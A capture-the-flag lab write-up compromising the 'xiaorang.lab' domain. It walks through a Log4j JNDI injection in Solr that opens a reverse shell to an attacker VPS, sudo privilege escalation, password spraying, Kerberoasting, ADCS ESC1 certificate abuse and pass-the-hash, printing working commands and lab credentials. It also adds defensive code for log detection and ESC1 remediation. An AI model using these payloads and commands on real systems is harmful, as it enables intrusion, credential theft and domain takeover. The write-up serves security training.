Run a quick scan with fscan:

```text
fscan version: 1.8.3
start infoscan
39.98.122.181:8983 open
39.98.122.181:22 open
39.98.122.181:80 open
```
JNDI injection
The service on port 8983 (Solr) uses Log4j.

Test with a DNS out-of-band callback first:

```text
http://39.98.122.181:8983/solr/admin/collections?action=${jndi:ldap://ew7eu8.dnslog.cn}
```

Got the callback.

Start JNDIExploit on the VPS:

```bash
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPS_IP
```
Send the payload while listening on port 9383:

```http
GET /solr/admin/collections?action=${jndi:ldap://VPS_IP:1389/Basic/ReverseShell/VPS_IP/9383} HTTP/1.1
Host: 39.99.154.173:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
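The request above is what a defender has to spot in the web server's access log. The following Python is an added example, not code from the original post: it scans constructed Apache/Nginx-style log lines for a Log4j JNDI lookup in the request line after URL-decoding and pulls out the callback host to hunt for in outbound DNS and LDAP traffic; the addresses and the hostname attacker.example in the sample are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not from the original
# post. Line 2 is the Solr request shown above, URL-encoded the way a web server
# records it; line 3 is the same request sent un-encoded. attacker.example is a placeholder.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jul/2023:10:01:02 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 612
10.0.0.9 - - [14/Jul/2023:10:01:09 +0000] "GET /solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%3A1389%2Fa%7D HTTP/1.1" 500 0
10.0.0.9 - - [14/Jul/2023:10:01:15 +0000] "GET /solr/admin/collections?action=${jndi:ldap://attacker.example:1389/a} HTTP/1.1" 500 0
10.0.0.7 - - [14/Jul/2023:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 10918
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+')
# A Log4j lookup starts with ${jndi:<scheme>:...}; match after URL-decoding so the
# encoded and raw forms are treated alike. Obfuscated nested-lookup variants exist,
# so treat this as triage, not as a substitute for patching or disabling lookups.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:", re.IGNORECASE)
CALLBACK_RE = re.compile(r"\$\{\s*jndi\s*:\s*[a-z]+\s*:\s*//(?P<host>[^/:}\s]+)", re.IGNORECASE)

def find_jndi_requests(log_text: str) -> list[dict]:
    """Return one record per request whose decoded request line carries a JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(m["request"])
        j = JNDI_RE.search(decoded)
        if not j:
            continue
        c = CALLBACK_RE.search(decoded)
        hits.append({
            "src": m["src"], "ts": m["ts"], "status": int(m["status"]),
            "scheme": j["scheme"].lower(),
            "callback_host": c["host"] if c else None,  # host to hunt for in outbound DNS/LDAP
            "request": decoded,
        })
    return hits

if __name__ == "__main__":
    for h in find_jndi_requests(SAMPLE_LOG):
        print(f'{h["ts"]} {h["src"]} -> {h["scheme"]} callback to {h["callback_host"]}: {h["request"]}')
```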

No SUID binary found for privilege escalation, so try sudo.
Privilege escalation via grc

https://gtfobins.github.io/gtfobins/grc/

```bash
sudo grc find / -name 'flag*'
```

```bash
sudo grc cat /root/flag/flag01.txt
```

Internal network penetration
Next, set up a proxy, upload fscan and scan the 172.22.9.x segment:

```text
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.47 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.26 is alive
[*] Icmp alive hosts len is: 4
172.22.9.7:135 open
172.22.9.19:8983 open
172.22.9.47:21 open
172.22.9.19:80 open
172.22.9.47:22 open
172.22.9.19:22 open
172.22.9.26:445 open
172.22.9.7:445 open
172.22.9.47:445 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.47:139 open
172.22.9.26:135 open
172.22.9.7:88 open
172.22.9.7:80 open
172.22.9.47:80 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[*] NetBios 172.22.9.7    [+] DC:XIAORANG\XIAORANG-DC
[*] NetInfo
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[*] NetBios 172.22.9.26   DESKTOP-CBKTVMO.xiaorang.lab   Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] NetBios 172.22.9.47   fileserver   Windows 6.1
[*] OsInfo 172.22.9.47 (Windows 6.1)
[*] WebTitle http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect
```
Analysis of the hosts:

```text
172.22.9.7    XIAORANG-DC
172.22.9.19   current compromised machine
172.22.9.26   DESKTOP-CBKTVMO
172.22.9.47   fileserver
```
The challenge is tagged SMB, so presumably there is an SMB service; fscan found a host named fileserver, so try connecting to it:

```bash
proxychains python3 smbclient.py 172.22.9.47
```


Found it under the `secret` directory.

Then go back to the root directory and download the database with `get personnel.db`. Looking at it, there is a user table that contains passwords but no usernames.
Import it and take a look:

A pile of usernames and passwords; try password spraying.

Password spraying

```bash
proxychains4 hydra -L user.txt -P pass.txt 172.22.9.26 rdp >>result.txt
cat result.txt | grep account
```
Two of them work:

```text
zhangjian:i9XDE02pLVf
liupeng:fiAzGwEMgTY
```
Kerberoasting attack
The hint earlier mentioned SPNs, so look for SPNs under domain users:

```bash
proxychains4 python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
```

Save the output and crack the hashes:

```text
zhangxia:MyPass2@@6
chenchen:@Passw0rd@
```
RDP in again; there is no permission to access the files under the admin directory, but 172.22.9.13, a CA domain member machine, turns up.
ADCS
Going back to the challenge description, it mentions ADCS, so the guess is to take the domain controller through a certificate from that CA. First enumerate the certificate templates:

```bash
proxychains certipy-ad find -u 'liupeng@xiaorang.lab' -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout
```
```text
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via CSRA
[proxychains] Strict chain  ...  1.92.148.33:5566  ...  XIAORANG-DC.xiaorang.lab:135 <--socket error or timeout!
[!] Got error while trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via CSRA: Could not connect: [Errno 111] Connection refused
[*] Trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP
[proxychains] Strict chain  ...  1.92.148.33:5566  ...  XIAORANG-DC.xiaorang.lab:445 <--socket error or timeout!
[!] Got error while trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused
[!] Failed to get CA configuration for 'xiaorang-XIAORANG-DC-CA'
[proxychains] Strict chain  ...  1.92.148.33:5566  ...  XIAORANG-DC.xiaorang.lab:80 <--socket error or timeout!
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : xiaorang-XIAORANG-DC-CA
    DNS Name                            : XIAORANG-DC.xiaorang.lab
    Certificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Certificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5
    Certificate Validity Start          : 2023-07-14 04:33:21+00:00
    Certificate Validity End            : 2028-07-14 04:43:21+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : XR Manager
    Display Name                        : XR Manager
    Certificate Authorities             : xiaorang-XIAORANG-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Authenticated Users
      Object Control Permissions
        Owner                           : XIAORANG.LAB\Administrator
        Write Owner Principals          : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Dacl Principals           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Property Principals       : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
```
ESC1 found; adjust the hosts file.
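The certipy output above lists exactly the properties that together make a template ESC1-abusable. The following Python is an added example, not certipy's code: it encodes the ESC1 preconditions as a checklist, evaluates the XR Manager template as transcribed from the output, and shows that removing the requester-supplied subject and the broad enrollment rights closes the finding; the Template class and its field names are this example's own.

```python
from dataclasses import dataclass, replace

# Principals whose enrollment right makes a template reachable by any domain account.
LOW_PRIV = {"domain users", "authenticated users", "domain computers", "everyone"}

@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool
    client_authentication: bool      # EKU includes Client Authentication
    any_purpose: bool                # EKU includes Any Purpose (also usable for logon)
    enrollee_supplies_subject: bool  # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: requester picks the SAN
    requires_manager_approval: bool
    authorized_signatures_required: int
    enrollment_rights: tuple[str, ...]

def low_priv_enrollers(t: Template) -> list[str]:
    """Enrollment principals that every authenticated domain user belongs to."""
    return [p for p in t.enrollment_rights if p.split("\\")[-1].lower() in LOW_PRIV]

def esc1_conditions(t: Template) -> dict[str, bool]:
    """Each ESC1 precondition and whether this template meets it."""
    return {
        "enabled": t.enabled,
        "auth_eku": t.client_authentication or t.any_purpose,
        "enrollee_supplies_subject": t.enrollee_supplies_subject,
        "no_manager_approval": not t.requires_manager_approval,
        "no_authorized_signatures": t.authorized_signatures_required == 0,
        "low_priv_can_enroll": bool(low_priv_enrollers(t)),
    }

def is_esc1(t: Template) -> bool:
    """ESC1 needs every precondition at once; breaking any one of them closes it."""
    return all(esc1_conditions(t).values())

def remediate(t: Template) -> Template:
    """Stop accepting a requester-chosen subject/SAN and drop broad enrollment rights."""
    broad = low_priv_enrollers(t)
    kept = tuple(p for p in t.enrollment_rights if p not in broad)
    return replace(t, enrollee_supplies_subject=False, enrollment_rights=kept)

# Transcribed from the certipy output above for the 'XR Manager' template.
XR_MANAGER = Template(
    name="XR Manager", enabled=True, client_authentication=True, any_purpose=False,
    enrollee_supplies_subject=True, requires_manager_approval=False,
    authorized_signatures_required=0,
    enrollment_rights=("XIAORANG.LAB\\Domain Admins", "XIAORANG.LAB\\Domain Users",
                       "XIAORANG.LAB\\Enterprise Admins", "XIAORANG.LAB\\Authenticated Users"),
)
```

Running `is_esc1(XR_MANAGER)` reports True and `is_esc1(remediate(XR_MANAGER))` reports False; the same checklist can be fed from any template export, not only certipy's.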

ESC1
Request a certificate from the XR Manager template impersonating the domain administrator, obtaining administrator.pfx:

```bash
proxychains4 certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab
```

Use the administrator.pfx certificate to obtain a TGT and the NTLM hash:

```bash
proxychains4 certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7
```

With the domain controller's Administrator hash, do pass-the-hash:

```bash
proxychains4 python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk
```

```bat
type C:\Users\Administrator\flag\flag04.txt
```

Then move to the other machine and get flag 3:

```bash
proxychains python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/Administrator@172.22.9.26 -codec gbk
```

```bat
type C:\Users\Administrator\flag\flag03.txt
```